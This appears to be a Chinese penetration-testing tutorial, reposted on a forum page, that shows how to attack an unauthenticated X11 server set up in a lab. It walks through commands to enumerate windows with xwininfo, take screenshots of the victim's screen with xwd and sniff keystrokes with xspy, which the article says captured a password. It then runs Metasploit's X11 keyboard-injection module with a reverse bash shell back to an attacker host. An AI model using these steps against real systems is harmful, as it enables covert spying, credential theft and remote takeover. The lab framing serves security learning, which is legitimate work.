X11服务器上的渗透测试

X是一个独立于架构的系统,用于远程图形用户界面和输入设备功能。使用联网终端的每个人都具有与任何类型的用户输入设备交互的能力。
资料来源:维基百科
在大多数情况下,X的服务器访问控制被禁用。但如果启用,它允许任何人连接到服务器。此漏洞称为X11服务器未经身份验证的访问打开。您可以在此处获取更多信息。
为了进行适当的演示,我们必须创建一个具有此漏洞的实验室。
实验室设置
我们将使用Ubuntu 14.04系统进行此漏洞实验室设置。在基本安装Ubuntu Server之后,我们将专注于查找“ lightdm.conf”文件。该文件的位置是:/etc/lightdm/lightdm.conf。但如果你似乎无法在那个地方找到它,你可以从这里获得它。
要编辑文件,我们将使用gedit。
gedit /etc/lightdm/lightdm.conf
要创建漏洞,我们将取消注释以下行:
xserver-allow-tcp=true
现在我们已经在conf文件中进行了更改,为了使它们生效,我们将重新启动lightdm服务
命令:service lightdm restart
现在,当lightdm服务重新启动时,我们将禁用访问控制。这将允许网络上的客户端连接到服务器。
命令:xhost +
就是这样。我们已成功创建了X11 Vulnerable Server。


X11服务器的渗透测试

要开始渗透测试,我们将从nmap扫描开始。
nmap -sV 192.168.1.109
我们在服务器上打开了TCP端口6000(192.168.1.109)。此外,它正在该端口上运行X11服务。
Nmap有一个脚本,用于检查是否允许攻击者连接到X Server。我们可以检查X Sever是否允许我们进行连接,如下所示。

nmap 192.168.1.109 -p 6000 --script x11-access

XWININFO

这是Kali中的内置实用程序,它显示X Service的窗口信息。在Penetration Testing中,xwininfo可用于获取有关在目标系统上打开的窗口的信息。
命令:xwininfo -root -tree -display 192.168.1.109:0
  • Root =指定X的根窗口是目标窗口
  • Tree =显示窗口的名称
  • Display =指定要连接的服务器
我们可以从上面的截图中提取很多信息,例如:

  • 受害者已开通Gnome终端
  • 受害者是VMware用户
  • 受害者已打开Nautilus(Ubuntu文件浏览器)



XWD

它是一个X Window System实用程序,有助于截取屏幕截图。在我们的Kali系统上,我们将使用xwd来截取Xserver的截图。此实用程序以xwd格式截取屏幕截图。
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd
Root =表示应为窗口转储选择根窗口
Screen =表示用于获取图像的GetImage请求
沉默=静默操作,即在倾倒窗口之前和之后不要响铃。

Display =指定要连接的服务器
运行上述命令后,我们将成功捕获受害系统的屏幕截图。

这里我们有xwd捕获的截图,但它是.xwd格式,所以要查看它,我们必须将它转换为可查看的格式,如.png
转换screenshot.xwd screenshot.png
此命令将xwd转换为png文件。运行此命令后,我们可以找到png文件格式的截图
在打开png文件时,我们可以看到xwd工具已成功捕获目标系统的屏幕截图。


XSPY


它是用于X Window服务器的内置工具Kali Linux。XSPY是一个嗅探器,它嗅探远程或本地X服务器上的击键。
command: xspy 192.168.1.109
我们可以从给定的屏幕截图中看到,我们已经获得了用户密码,因为受害者已经在不知不觉中输入了密码。另请注意,密码在服务器终端上不可见,但由于xspy捕获了键入的密钥,因此我们输入了密码。


让壳牌通过Metasploit

现在我们将使用Metasploit Framework的X11键盘命令注入模块。此模块通过连接和注册虚拟键盘来利用打开的X11服务器。然后,虚拟键盘用于打开xterm或gnome终端,然后键入并执行有效负载。
注意:由于X Server是可视服务,在执行模块时,目标系统上发生的每个任务都将对受害者可见。

现在,在打开Metasploit框架之后,我们将使用如下所示的有效负载:



use exploit/unix/x11/x11_keyboard_exec
msf exploit(unix/x11x11_keyboard_exec) > set rhost 192.168.1.109
msf exploit(unix/x11x11_keyboard_exec) > set payload cmd/unix/reverse_bash
msf exploit(unix/x11x11_keyboard_exec) > set lhost 192.168.1.120
msf exploit(unix/x11x11_keyboard_exec) > set lport 4444
msf exploit(unix/x11x11_keyboard_exec) > set time_wait 10
msf exploit(unix/x11x11_keyboard_exec) > run运行模块后,它将首先连接到服务器并搜索xterm并将其打开。

然后在等待10秒后,它将开始在xterm上键入脚本命令。
执行此命令后,xterm将关闭,但它将向Attacker 提供命令shell
转载请注明本文链接: http://www.mayidui.net/t2265.html
话题: 渗透 服务器
游客
登录后才可以回帖,登录 或者 注册